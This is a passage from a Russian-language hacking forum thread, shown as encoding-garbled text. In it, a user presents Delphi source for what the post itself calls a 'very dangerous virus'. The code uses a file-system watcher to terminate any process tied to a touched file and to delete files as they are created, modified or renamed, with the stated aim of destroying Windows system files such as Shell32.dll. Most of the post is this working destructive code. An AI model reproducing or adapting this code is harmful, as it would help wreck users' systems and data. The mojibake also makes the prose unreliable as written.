Òåïåðü ïðîñòûì çàïóñêîì ïðèëîæåíèÿ ìû âîçâðàùàåì ñåáå âëàñòü íàä ðååñòðîì, à çíà÷èò - è íàä âñåé ñèñòåìîé. Íà ýòîì âñå ïîêà.... ïîéäó â Ñòàðêðàôò ïîøïèëþ ))

+1

16

  • Àâòîð: Gull
  • Þçåð
  • Gull
  • Çàðåãèñòðèðîâàí: 2007-12-26
  • Ïðèãëàøåíèé: 0
  • Ñîîáùåíèé: 30
  • Óâàæåíèå: [+6/-0]
  • Ïîçèòèâ: [+1/-0]
  • Ïðîâåë íà ôîðóìå:
    3 ÷àñà 26 ìèíóò
  • Ïîñëåäíèé âèçèò:
    2008-08-26 02:23:28

Ñåãîäíÿ ìû íàïèøåì î÷åíü îïàñíûé âèðóñ. Îí áóäåò îòëàâëèâàòü çàïóñê è èçìåíåíèå ôàéëîâ, ïîëó÷àòü èõ èìåíà, çàâåðøàòü ïðîöåññ ïî èìåíè è óäàëÿòü. Íàïðèìåð âû îáíîâèòå Ðàáî÷èé Ñòîë è âèðóñ óäàëèò Shell32.dll. Èòàê ñîçäàäèì âñïîìîãàòåëüíûé ìîäóëü, êîòîðûé áóäåò ñëåäèòü çà çàïóñêîì è èçìåíåíèåì ñèñòåìû:

unit wfsU;

interface

type
// Ñòðóêòóðà ñ èíôîðìàöèåé îá èçìåíåíèè â ôàéëîâîé ñèñòåìå (ïåðåäàåòñÿ â callback ïðîöåäóðó)

  PInfoCallBack = ^TInfoCallBack;
  TInfoCallBack = record
    FAction      : Integer; // òèï èçìåíåíèÿ (êîíñòàíòû FILE_ACTION_XXX)
    FDrive       : string;  // äèñê, íà êîòîðîì áûëî èçìåíåíèå
    FOldFileName : string;  // èìÿ ôàéëà äî ïåðåèìåíîâàíèÿ
    FNewFileName : string;  // èìÿ ôàéëà ïîñëå ïåðåèìåíîâàíèÿ
  end;

  // callback ïðîöåäóðà, âûçûâàåìàÿ ïðè èçìåíåíèè â ôàéëîâîé ñèñòåìå
  TWatchFileSystemCallBack = procedure (pInfo: TInfoCallBack);

{ Çàïóñê ìîíèòîðèíãà ôàéëîâîé ñèñòåìû
  Ïðàìåòðû:
  pName    - èìÿ ïàïêè äëÿ ìîíèòîðèíãà
  pFilter  - êîìáèíàöèÿ êîíñòàíò FILE_NOTIFY_XXX
  pSubTree - ìîíèòîðèòü ëè âñå ïîäïàïêè çàäàííîé ïàïêè
  pInfoCallBack - àäðåñ callback ïðîöåäóðû, âûçûâàåìîé ïðè èçìåíåíèè â ôàéëîâîé ñèñòåìå}

procedure StartWatch(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
// Îñòàíîâêà ìîíèòîðèíãà
procedure StopWatch;

procedure MyInfoCallBack(pInfo: TInfoCallBack);

implementation

uses
  Classes, Windows, SysUtils, TlHelp32;

const
  FILE_LIST_DIRECTORY   = $0001;

type
  PFileNotifyInformation = ^TFileNotifyInformation;
  TFileNotifyInformation = record
    NextEntryOffset : DWORD;
    Action          : DWORD;
    FileNameLength  : DWORD;
    FileName        : array[0..0] of WideChar;
  end;

  WFSError = class(Exception);

  TWFS = class(TThread)
  private
    FName           : string;
    FFilter         : Cardinal;
    FSubTree        : boolean;
    FInfoCallBack   : TWatchFileSystemCallBack;
    FWatchHandle    : THandle;
    FWatchBuf       : array[0..4096] of Byte;
    FOverLapp       : TOverlapped;
    FPOverLapp      : POverlapped;
    FBytesWritte    : DWORD;
    FCompletionPort : THandle;
    FNumBytes       : Cardinal;
    FOldFileName    : string;
    function CreateDirHandle(aDir: string): THandle;
    procedure WatchEvent;
    procedure HandleEvent;
  protected
    procedure Execute; override;
  public
    constructor Create(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
    destructor Destroy; override;
  end;

var
  WFS : TWFS;

function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
    UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
    UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
      PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;

procedure MyInfoCallBack(pInfo: TInfoCallBack);
  begin
     try
    case pInfo.FAction of
      FILE_ACTION_RENAMED_NEW_NAME: DeleteFile(pInfo.FDrive+pInfo.FNewFileName);
    else
      if pInfo.FAction<FILE_ACTION_RENAMED_OLD_NAME then
        KillTask(ExtractFileName(pInfo.FDrive+pInfo.FNewFileName));
        DeleteFile(pInfo.FDrive+pInfo.FNewFileName);
    end;
    except
      //////////////
     end;
  end;

procedure StartWatch(pName: string; pFilter: cardinal; pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
begin
WFS:=TWFS.Create(pName, pFilter, pSubTree, pInfoCallBack);
end;

procedure StopWatch;
var
  Temp : TWFS;
begin
  if Assigned(WFS) then
  begin
   PostQueuedCompletionStatus(WFS.FCompletionPort, 0, 0, nil);
   Temp := WFS;
   WFS:=nil;
   Temp.Terminate;
  end;
end;

constructor TWFS.Create(pName: string; pFilter: cardinal;
  pSubTree: boolean; pInfoCallBack: TWatchFileSystemCallBack);
begin
  inherited Create(True);
  FreeOnTerminate:=True;
  FName:=IncludeTrailingBackslash(pName);
  FFilter:=pFilter;
  FSubTree:=pSubTree;
  FOldFileName:=EmptyStr;
  ZeroMemory(@FOverLapp, SizeOf(TOverLapped));
  FPOverLapp:=@FOverLapp;
  ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
  FInfoCallBack:=pInfoCallBack;
  Resume
end;

destructor TWFS.Destroy;
begin
  PostQueuedCompletionStatus(FCompletionPort, 0, 0, nil);
  CloseHandle(FWatchHandle);
  FWatchHandle:=0;
  CloseHandle(FCompletionPort);
  FCompletionPort:=0;
  inherited Destroy;
end;

function TWFS.CreateDirHandle(aDir: string): THandle;
begin
Result:=CreateFile(PChar(aDir), FILE_LIST_DIRECTORY, FILE_SHARE_READ+FILE_SHARE_DELETE+FILE_SHARE_WRITE,
                   nil,OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS or FILE_FLAG_OVERLAPPED, 0);
end;

procedure TWFS.Execute;
begin
  FWatchHandle:=CreateDirHandle(FName);
  WatchEvent;
end;

procedure TWFS.HandleEvent;
var
  FileNotifyInfo : PFileNotifyInformation;
  InfoCallBack   : TInfoCallBack;
  Offset         : Longint;
begin
  Pointer(FileNotifyInfo) := @FWatchBuf[0];
  repeat
    Offset:=FileNotifyInfo^.NextEntryOffset;
    InfoCallBack.FAction:=FileNotifyInfo^.Action;
    InfoCallBack.FDrive:=FName;
    SetString(InfoCallBack.FNewFileName,FileNotifyInfo^.FileName,
              FileNotifyInfo^.FileNameLength );
    InfoCallBack.FNewFileName:=Trim(InfoCallBack.FNewFileName);
    case FileNotifyInfo^.Action of
      FILE_ACTION_RENAMED_OLD_NAME: FOldFileName:=Trim(WideCharToString(@(FileNotifyInfo^.FileName[0])));
      FILE_ACTION_RENAMED_NEW_NAME: InfoCallBack.FOldFileName:=FOldFileName;
    end;

    FInfoCallBack(InfoCallBack);
    PChar(FileNotifyInfo):=PChar(FileNotifyInfo)+Offset;
  until (Offset=0) or Terminated;
end;

procedure TWFS.WatchEvent;
var
CompletionKey: Cardinal;
begin
  FCompletionPort:=CreateIoCompletionPort(FWatchHandle, 0, Longint(pointer(self)), 0);
  ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
  if not ReadDirectoryChanges(FWatchHandle, @FWatchBuf, SizeOf(FWatchBuf), FSubTree,
    FFilter, @FBytesWritte,  @FOverLapp, 0) then
  begin
    raise WFSError.Create(SysErrorMessage(GetLastError));
    Terminate;
  end else
  begin
    while not Terminated do
    begin
      GetQueuedCompletionStatus(FCompletionPort, FNumBytes, CompletionKey, FPOverLapp, INFINITE);
      if CompletionKey<>0 then
      begin
        Synchronize(HandleEvent);
        ZeroMemory(@FWatchBuf, SizeOf(FWatchBuf));
        FBytesWritte:=0;
        ReadDirectoryChanges(FWatchHandle, @FWatchBuf, SizeOf(FWatchBuf), FSubTree, FFilter,
                             @FBytesWritte, @FOverLapp, 0);
      end else Terminate;
    end
  end
end;

end.

+2

Ñòðàíèöà: 1